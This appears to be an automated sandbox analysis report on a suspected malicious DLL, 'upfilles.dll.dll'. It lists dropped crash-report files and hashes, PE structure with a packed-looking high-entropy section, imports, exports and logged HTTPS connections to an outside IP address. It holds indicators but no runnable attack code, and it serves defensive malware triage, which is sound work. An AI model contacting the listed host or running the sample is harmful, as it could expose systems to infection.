SHA1: 0C660AE3539AE95EDF65C53088E9DA7EB5DFFEC9
SHA-256: C313D051688A264AD7778F15CEC6ECB0D2FA908EA92D9134E25ED80B3B43C826
SHA-512: A0A17281B979ACB45169A5C79673EC67EEC58F73B21E9D325CE34BD1630D7DBF459BF7AA4DCCE803D8D4842130BCD62AEE4F3822E8A75FA2770905BD285D0830
Malicious: false
Preview (UTF-16 text, decoded):
  Version=1
  EventType=APPCRASH
  EventTime=133598522485597425
  ReportType=2
  Consent=1
  UploadTime=133598522489972439
  ReportStatus=524384
  ReportIdentifier=7dc7f057-dc81-4d91-9caa-bd8701d223a3
  IntegratorReportIdentifier=0b5fa4a6-84c8-412c-b811-e9d87252dc7a
  Wow64Host=34404
  NsAppName=rundll32.exe_upfilles.dll.dll
  OriginalFilename=RUNDLL32.EXE
  AppSessionGuid=00001c68-0001-0014-0417-06fb25a3da01
  TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000dd399ae46303343f9f0da189aee11c67bd86

Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.7695999953173611
Encrypted: false
SSDEEP: 96:TEF1ks0/idyKygsj+4RvNxrfKQXIDcQOc6ncETcw3CCXaXz+HbHgSQgJjZh88Wp8:o3CidygK0wjpFjbyzuiFeZ24lO83
MD5: F9DA4317B3745718F8A31BB61F06A4F4
SHA1: 9BD89B72FF6CD9493B7343C4A720B403B54D0439
SHA-256: 072151E64254174294A716437E4F986EC8336BAC545EBEA5D71EC5A481A00DBD
SHA-512: D2E3D37FAB0EB27FDEAA9A17C253B5D225EA96CD53D898A9F7A8A829D2D6B887E0139387DF6CDA03D85A7E2E8595025E08032A65822C12B65E124144B35837AC
Malicious: false
Preview (UTF-16 text, decoded):
  Version=1
  EventType=APPCRASH
  EventTime=133598522423779682
  ReportType=2
  Consent=1
  UploadTime=133598522427373435
  ReportStatus=524384
  ReportIdentifier=8641b0ad-46f6-452c-a496-10d58d4ec871
  IntegratorReportIdentifier=ea02eb5a-08a0-4c31-b139-448174298eaa
  Wow64Host=34404
  NsAppName=rundll32.exe_upfilles.dll.dll
  OriginalFilename=RUNDLL32.EXE
  AppSessionGuid=000018b4-0001-0014-0df7-6bf725a3da01
  TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000dd399ae46303343f9f0da189aee11c67bd86

Process: C:\Windows\System32\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Fri May 10 22:04:02 2024, 0x1205a4 type
Category: dropped
Size (bytes): 66070
Entropy (8bit): 1.5462375465383378
Encrypted: false
SSDEEP: 96:5u8hjNE3e2neSVUa52sl4GbfhHoi7M9UUACGcKutR1ZfE0FXtpqgJbqStCSqjWIF:XhjNi2OM+UAtq1ZfNTqgwStCS9ngz
MD5: 677694119DA44E5FEC7BF1C1317E830B
SHA1: 4FEB41E3E2792D4305F3FD66F5EE17E8BFFDA32D
SHA-256: 13C9DE6CF736408ECF3F5D8B186442A3381B005B307FDBD5DCEB114A627866FB
SHA-512: 000B790E53523A6DFE23A290EFD228BFF0E399927D925B880663ED99F0F3E07957C357E346C4976419B62BC34EC43367BE19E3CA39663B65BD3A6E16CDCE2824
Malicious: false
Preview: binary minidump (MDMP signature); readable UTF-16 strings in the header: "W. Europe Standard Time", "W. Europe Summer Time", "19041.1.amd64fre.vb_release.191206-1406"

Process: C:\Windows\System32\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8534
Entropy (8bit): 3.6939797702013397
Encrypted: false
SSDEEP: 192:R6l7wVeJqdgkmE6Yo8N4LgmfWP3pry89bU66Wf088m:R6lXJqakmE6YLegmfWPRU6DfR
MD5: 80B9B0AFA9ABA69B9A78557C448086C5
SHA1: B99101A8A598F674B85334D5F8A0609AC22631E6
SHA-256: 9968C12422E570B5EE4916B7EDF4BC0240E72DE23F62EF10630EC4B1E51814FF
SHA-512: 8D2CBE94CDDBA9C7F4FDD42B91E690533542BB23B8DD38FD258D3CC44585D6C07E12DA68A06CC179B1B8C7D8C3A8F400316A4787D58FB980DD530F34F2BAB469
Malicious: false
Preview (UTF-16 text, decoded, truncated):
  <?xml version="1.0" encoding="UTF-16"?>
  <WERReportMetadata>
    <OSVersionInformation>
      <WindowsNTVersion>10.0</WindowsNTVersion>
      <Build>19045</Build>
      <Product>(0x30): Windows 10 Pro</Product>
      <Edition>Professional</Edition>
      <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
      <Revision>2006</Revision>
      <Flavor>Multiprocessor Free</Flavor>
      <Architecture>X64</Architecture>
      <LCID>2057</LCID>
    </OSVersionInformation>
    <ProcessInformation>
      <Pid>6324</Pi

Process: C:\Windows\System32\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4777
Entropy (8bit): 4.477202967569579
Encrypted: false
SSDEEP: 48:cvIwWl8zssJg771I99aWpW8VY+Ym8M4JCNCF0laFtyq85mQCy8ptSTSLd:uIjfqI7+b7VeJilCGT8poOLd
MD5: 5D367A225C41966DC6550185A90DAE6F
SHA1: 101CC4DF6477453EA9552B5AD0EE1273F1599AEA
SHA-256: E6997AC198F3DBE27F9915E0C4A3CC5E65654C6536885480C9BC6EF40290C190
SHA-512: EDF7487656C3685EFE40BEAB794203DDBF95DD49E14CA56E27EAC8BD88B5CCE0BFF9C5555D329990288C05738F40CF731B5EE9D15DB3800A90DCA5F80C5D46F8
Malicious: false
Preview (truncated):
  <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
  <req ver="2">
   <tlm>
    <src>
     <desc>
      <mach>
       <os>
        <arg nm="vermaj" val="10" />
        <arg nm="vermin" val="0" />
        <arg nm="verbld" val="19045" />
        <arg nm="vercsdbld" val="2006" />
        <arg nm="verqfe" val="2006" />
        <arg nm="csdbld" val="2006" />
        <arg nm="versp" val="0" />
        <arg nm="arch" val="9" />
        <arg nm="lcid" val="2057" />
        <arg nm="geoid" val="223" />
        <arg nm="sku" val="48" />
        <arg nm="domain" val="0" />
        <arg nm="prodsuite" val="256" />
        <arg nm="ntprodtype" val="1" />
        <arg nm="platid" val="2" />
        <arg nm="tmsi" val="317586" />
        <arg nm="osinsty" val="1" />
        <arg nm="iever" val="11.789.19041.0-11.0.1000" />
        <arg nm="portos" val="0" />
        <arg nm="ram" val="409

Process: C:\Windows\System32\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Fri May 10 22:04:05 2024, 0x1205a4 type
Category: dropped
Size (bytes): 58190
Entropy (8bit): 1.605256614606473
Encrypted: false
SSDEEP: 192:0VrYrCpCzQOMAsu+Qiqwxay+QsK0QRAQh:2E1TpoQi1aZQsK/Rp
MD5: CAAA37C00D8ECF6FA5FC4FA2A30BD2FA
SHA1: 2F9D061ED037ECE51B72AC937A99813073410435
SHA-256: ECA00EFCB890B105FA3A548999F1E7A161FD7BDB5ED7B1F2FF2240DF570C41E2
SHA-512: 9432BA4BCEB6E8A6D56DB1CBD256C7A1C3835413B22B4CEC7A7D8D7FACC8A85CF7E981CDC802E9A7001EB67285401042ED97471A5617B1D8BC220A145DD928C2
Malicious: false
Preview: binary minidump (MDMP signature); readable UTF-16 strings in the header: "W. Europe Standard Time", "W. Europe Summer Time", "19041.1.amd64fre.vb_release.191206-1406"

                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8534
                                                                                                                Entropy (8bit):3.6966319113948383
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:R6l7wVeJRBAmS6YojN4LgmfWfiwsprRC89br4Wf9vZm:R6lXJXAmS6YEegmfWqP7rxfi
                                                                                                                MD5:B607A2EB5584FD30993D12ABB2C4DF8A
                                                                                                                SHA1:F2E1E2CE69FB5F3AB9850FF3A56668B6DFAE0AFF
                                                                                                                SHA-256:DC1BDEED634E5907DFD137282558057ED000A00CD7BABC1ABC665D6B47410064
                                                                                                                SHA-512:249030B4D7B167C51DA04101F483BFE2D977EDE4D0DBAF6E45720002D56785033391999DCBE0591289B8DE51E15D1C1ADBCE641A4472471D0A4B869CED69DDAD
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4777
                                                                                                                Entropy (8bit):4.480227848947886
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwWl8zssJg771I99aWpW8VYsYm8M4JCNCF0saFmjyq85mQCrAptSTSDd:uIjfqI7+b7VEJi8jGfpoODd
                                                                                                                MD5:76611ED68AE98A3C1C5418DA42AD9839
                                                                                                                SHA1:E56614DC31056975565348CCA2BC464DC61B1657
                                                                                                                SHA-256:1E7C757B8CED61BB0960A6FD8EE447BE3D82DF516B6DBF0CD4E9DD3CD465F897
                                                                                                                SHA-512:1852341A694CC87F021633950EA49ECE0FDC5D470769097BE801C9F5F525F77E075FF0F4FC9BAE3266E303161AB520D0DEFF756C4B6DF3F6CF50F20AD73A052C
                                                                                                                Malicious:false
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="317586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:Mini DuMP crash report, 14 streams, Fri May 10 22:04:08 2024, 0x1205a4 type
                                                                                                                Category:dropped
                                                                                                                Size (bytes):57494
                                                                                                                Entropy (8bit):1.6234250646337964
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:duYrC6W3OMlUsn9pHz+bF7frc/wHGpzp/iaBReJd5U6:rhZgV9lxXpzp/9jePL
                                                                                                                MD5:66F2A3C376DA0D558312FF6110D838C3
                                                                                                                SHA1:834B317025A81AA5E7F00DF4430D56F7D760645B
                                                                                                                SHA-256:562F917C37C8D1E62F2E934483DEF3B9032D3EDBDE40154FD19E1CEA1BE2BAF2
                                                                                                                SHA-512:58CC96682B33937C6CBB1E4CA8C0F7A07A37CD327DF704A9149CEAD1272E8F4C2539691B2C8FA46B75BB017353F11C02BD129EFE4159EE3081DF67D534CB974C
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8522
                                                                                                                Entropy (8bit):3.6962697567258553
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:R6l7wVeJtabmV6Y7pGgmfWP3prM89b+rWfxKm:R6lXJwbmV6YFGgmfWPT+6fd
                                                                                                                MD5:B71FE5E91F46A2F6E80793B28555315E
                                                                                                                SHA1:52F0EE991F743BEA0995768C5AA075635A979098
                                                                                                                SHA-256:7F8F6E795A696CA77E094A9664C2A6B795FFB3C2E9A5A6AEF1ED303C408F7EA0
                                                                                                                SHA-512:5CE960EE43F0BD8BEE75A7688B62FD8BD51F4CE59AF84251C28867D7FD5E54FF5E03D2D159A5C36D8B04415FB04CF4EA130D1036D1D8DC564B5B2F961FFE0203
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4777
                                                                                                                Entropy (8bit):4.478653683433715
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwWl8zssJg771I99aWpW8VYpYm8M4JCNCF0laFniyq85mQCypptSTS6d:uIjfqI7+b7V1JilVGTppoO6d
                                                                                                                MD5:DA7D9A451274291EFD3755DC8FC3A141
                                                                                                                SHA1:51E42DA26BBC94435F94EFDBDF8A242CC744E57C
                                                                                                                SHA-256:821799E5797BB8E3BCB45C123C170C09004DB0C21BB4FC46A6F6A99DE66FFC12
                                                                                                                SHA-512:1AADD5F0D59B95756B48DFE2F6F95D358774409C5E209449411050C86A5F3990AE52D7AA1BBDD93063D712B6CB0DC84BE371833813004423128DF6949663B53A
                                                                                                                Malicious:false
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="317586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:Mini DuMP crash report, 14 streams, Fri May 10 22:04:08 2024, 0x1205a4 type
                                                                                                                Category:dropped
                                                                                                                Size (bytes):54894
                                                                                                                Entropy (8bit):1.6839237359198767
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:59S8veE3+XuQRawUKUCGsV3bBvgoi7MxpnZ0mK1NX7RT9bCmYhJbqmpx5OqWRW/F:diYrCrOMzuJXeDwwx5OLIH9EyXh
                                                                                                                MD5:A837E0375D7983509A56860346CFCC15
                                                                                                                SHA1:F75FAE2A056C6FEF8D8F1D700F3412213DFFFB2D
                                                                                                                SHA-256:205CD9270682DC17A83E8D40610371F3ED964DD319E67BDBA4BE1780DF36D02F
                                                                                                                SHA-512:DAD398EB6A465DF561E9F4A51FD2D414C84CFFB7F34BC06FEE2515B88EDCAC48978359ADA324F8A441AE9304221089DF081651A0CC5B770D121A04ED586B5A4A
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8522
                                                                                                                Entropy (8bit):3.6958245523678235
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:R6l7wVeJoigmd6Y7GGgmfWfiwsprH89b+vWfuKm:R6lXJdgmd6Y6GgmfWq2+ef6
                                                                                                                MD5:57975B44072D1C9B3E80DB2266217745
                                                                                                                SHA1:A9CF9831C70448BFE57EB598D192F042A2AE3A6D
                                                                                                                SHA-256:415AD9CE27C4A61A389B2D2AE85DF89BB06FEFD9971BDB3399CAE445E58B8910
                                                                                                                SHA-512:93854E117CDB0F89602B01AA667CE2E15D7607242C6EC26A4B7060F5FCB7EB905ADB72A73E979F8B35E01DA8F21F8CEE3A99D7FA40DD04ABBBD3428F6F83C212
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4777
                                                                                                                Entropy (8bit):4.481691067176541
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwWl8zssJg771I99aWpW8VYSYm8M4JCNCF0saFBwtjyq85mQCrdptSTSNd:uIjfqI7+b7VCJiP0GqpoONd
                                                                                                                MD5:243DA7FD47223239375D054C23BDE13D
                                                                                                                SHA1:01345C28EFD562EEDE44945D9F8B54A30951ABC4
                                                                                                                SHA-256:CF4636B318E7DCECACDC72437D290E86C0501BCA90B77EE7585C1C837614D3D3
                                                                                                                SHA-512:9BCE637D0F2AA10F4FD3BE688AFC8B97DC87CD20E03157250D55EC6368C6E353BB80A712BA982C01CA00B082C593634FA65DC3295A1EF8F9DCAA3C69330CCD3F
                                                                                                                Malicious:false
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="317586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1835008
                                                                                                                Entropy (8bit):4.46640558354698
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:/IXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNcdwBCswSb9:wXD94zWlLZMM6YFHa+9
                                                                                                                MD5:B7B3B5CD7790EDF0686FF777BA5097D3
                                                                                                                SHA1:ED234CE4B519238F46F4AA9519B3C51AFB301F20
                                                                                                                SHA-256:221475E4ACF30CBC675FA384CAE2C143B9C04EF7B913D8D65B0052080F31D095
                                                                                                                SHA-512:2F5813E176688BB57E91FD992373740377CDE50F0EBF56BD906A17D6325F158525F85FA13581310839B2EB9219FD5E6F03A3DE3E3E9A32CF3DAAC2D1BAE26831
                                                                                                                Malicious:false
                                                                                                                File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                Entropy (8bit):7.38766220411242
                                                                                                                TrID:
                                                                                                                • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                                • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                                • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                                • DOS Executable Generic (2002/1) 1.70%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                                File name:upfilles.dll.dll
                                                                                                                File size:520'704 bytes
                                                                                                                MD5:ccb6d3cb020f56758622911ddd2f1fcb
                                                                                                                SHA1:4a013f752c2bf84ca37e418175e0d9b6f61f636d
                                                                                                                SHA256:f4cb6b684ea097f867d406a978b3422bbf2ecfea39236bf3ab99340996b825de
                                                                                                                SHA512:6ed929967005eaa6407e273b53a1fedcb2b084d775bed17272fd05b1ce143dbf921ac201246dfbfdbe663c7351e44c12f162e6f03343548b69b5d4598bb3492e
                                                                                                                SSDEEP:12288:8XG3MpAOIQ1LjbJFqzqUtYP4VnRk62yoK2:SpAOfFJIq/Py8K2
                                                                                                                TLSH:4AB4BE4A37A80CB6E867C17D88634705E3B27D610761C6DF1290536F9F3BBD2663AB12
                                                                                                                Icon Hash:7ae282899bbab082
                                                                                                                Entrypoint:0x18000e1c0
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:true
Imagebase: 0x180000000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
DLL Characteristics: HIGH_ENTROPY_VA
Time Stamp: 0x5C24FE09 [Thu Dec 27 16:30:01 2018 UTC]
TLS Callbacks: 0x80020fe0, 0x1
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 90ad3b5a283c3a333bb222c03419fb76
Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
  Subject Chain
    Version:
    Thumbprint MD5:
    Thumbprint SHA-1:
    Thumbprint SHA-256:
    Serial:
Instruction
    dec eax
    mov dword ptr [esp+08h], ebx
    dec eax
    mov dword ptr [esp+10h], esi
    push edi
    dec eax
    sub esp, 20h
    dec ecx
    mov edi, eax
    mov ebx, edx
    dec eax
    mov esi, ecx
    cmp edx, 01h
    jne 00007F611CBAF4F7h
    call 00007F611CBAF8D0h
    dec esp
    mov eax, edi
    mov edx, ebx
    dec eax
    mov ecx, esi
    dec eax
    mov ebx, dword ptr [esp+30h]
    dec eax
    mov esi, dword ptr [esp+38h]
    dec eax
    add esp, 20h
    pop edi
    jmp 00007F611CBAF384h
    int3
    int3
    int3
    dec eax
    mov dword ptr [esp+10h], ebx
    dec eax
    mov dword ptr [esp+18h], ebp
    push esi
    push edi
    inc ecx
    push esi
    dec eax
    sub esp, 10h
    xor ecx, ecx
    mov dword ptr [00029DFEh], 00000002h
    xor eax, eax
    mov dword ptr [00029DEEh], 00000001h
    cpuid
    inc esp
    mov edx, ecx
    inc esp
    mov ecx, edx
    xor ecx, 444D4163h
    xor edx, 69746E65h
    mov ebp, ebx
    inc ebp
    xor ebx, ebx
    xor ebp, 68747541h
    inc esp
    mov eax, ebx
    or ebp, edx
    inc esp
    mov esi, eax
    or ebp, ecx
    inc ecx
    xor ecx, 49656E69h
    inc ecx
    xor eax, 756E6547h
    inc ecx
    lea eax, dword ptr [ebx+01h]
    xor ecx, ecx
    inc ecx
    xor edx, 6C65746Eh
    cpuid
    inc ebp
    or eax, ecx
    mov dword ptr [esp], eax
    inc ebp
    or eax, edx
    mov dword ptr [esp+04h], ebx
    mov esi, ecx
    mov dword ptr [esp+08h], ecx
    mov edi, eax
    mov dword ptr [esp+00h], edx
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x36de0 | 0xbc | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x36e9c | 0x8c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3e000 | 0x1238 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x3b000 | 0x22bc | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x3c400 | 0x3278 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x40000 | 0x8fc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x31570 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x316d0 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x315d0 | 0x100 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x25000 | 0x3d8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x23a99 | 0x23c00 | 87bfc32636bf93aa5ba6a79278de1d82 | False | 0.5472779173951049 | data | 6.420263931637599 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x25000 | 0x12b20 | 0x12c00 | 0f7e92ec4b27ef7a718d78d4d512f916 | False | 0.4034114583333333 | OpenPGP Secret Key Version 3 | 4.778349716646358 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x38000 | 0x2b34 | 0x1600 | a4dd3c567a44787ef36b75c1461eadc7 | False | 0.189453125 | data | 3.77323134284555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x3b000 | 0x22bc | 0x2400 | 4b6b0ab05d617b8443d04115ebcf4698 | False | 0.4678819444444444 | data | 5.261331885690949 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x3e000 | 0x1238 | 0x1400 | 262a27cc3c07916543c338d007e971a7 | False | 0.3376953125 | data | 4.197268760185116 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x40000 | 0x8fc | 0xa00 | 029935b97db1b1dda5ddd384d84aface | False | 0.52734375 | data | 5.178504761959821 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
hVr | 0x41000 | 0x43000 | 0x42e00 | b359e2ed16a1c00b78e0035c276c8cf4 | False | 0.9683703271028037 | data | 7.985612673503669 | IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
REGISTRY | 0x3e6c0 | 0xc | ASCII text, with CRLF line terminators | English | United States | 1.6666666666666667
REGISTRY | 0x3e598 | 0x125 | ASCII text, with CRLF line terminators | English | United States | 0.7747440273037542
REGISTRY | 0x3e6d0 | 0x1fc | ASCII text, with CRLF line terminators | English | United States | 0.5866141732283464
TYPELIB | 0x3e8d0 | 0x7b8 | data | English | United States | 0.31983805668016196
RT_STRING | 0x3f088 | 0x2c | data | English | United States | 0.5681818181818182
RT_VERSION | 0x3e200 | 0x398 | OpenPGP Public Key | English | United States | 0.45652173913043476
RT_MANIFEST | 0x3f0b8 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | UnmapViewOfFile, FreeLibrary, GetModuleFileNameW, GetModuleHandleW, GetProcAddress, LoadLibraryExW, LoadResource, SizeofResource, FindResourceW, lstrcmpiW, MultiByteToWideChar, MapViewOfFile, EncodePointer, EnterCriticalSection, LeaveCriticalSection, GetThreadLocale, SetThreadLocale, CreateFileW, GetFileSizeEx, CreateFileMappingW, GetCurrentThreadId, GetCurrentProcessId, DeleteCriticalSection, InitializeCriticalSectionEx, GetLastError, RaiseException, DecodePointer, CloseHandle, CreateEventW, OpenEventA, CreateEventA, WaitForSingleObjectEx, ResetEvent, SetEvent, WriteConsoleW, GetConsoleMode, GetConsoleCP, WriteFile, LocalAlloc, SetLastError, LocalFree, IsDebuggerPresent, OutputDebugStringW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetStartupInfoW, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, InterlockedFlushSList, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, GetModuleHandleExW, HeapFree, HeapAlloc, HeapSize, HeapReAlloc, GetStdHandle, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetProcessHeap, SetFilePointerEx, GetStringTypeW, SetStdHandle, FlushFileBuffers
USER32.dll | CharNextW
ADVAPI32.dll | RegQueryInfoKeyW, RegOpenKeyExW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, RegSetValueExW
ole32.dll | CoTaskMemRealloc, CoTaskMemFree, CoCreateInstance, StringFromGUID2, CoTaskMemAlloc
OLEAUT32.dll | VarUI4FromStr, SysFreeString, SysAllocString, SysStringLen, LoadTypeLib, RegisterTypeLib, UnRegisterTypeLib
ntdll.dll | NtRequestWaitReplyPort, NtConnectPort, NtClose, NtRequestPort, RtlCaptureContext, RtlLookupFunctionEntry, NtCreateSection, RtlVirtualUnwind, RtlNtStatusToDosError, RtlInitUnicodeString
Name | Ordinal | Address
DllCanUnloadNow | 1 | 0x18000b1c0
DllGetClassObject | 2 | 0x18000b060
DllInstall | 3 | 0x18000b350
stow | 4 | 0x18000b1f0
DllUnregisterServer | 5 | 0x18000b330
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                    May 11, 2024 00:04:15.545084953 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.545223951 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.545291901 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.545304060 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.545350075 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.665793896 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.665921926 CEST49750443192.168.2.4138.124.183.215
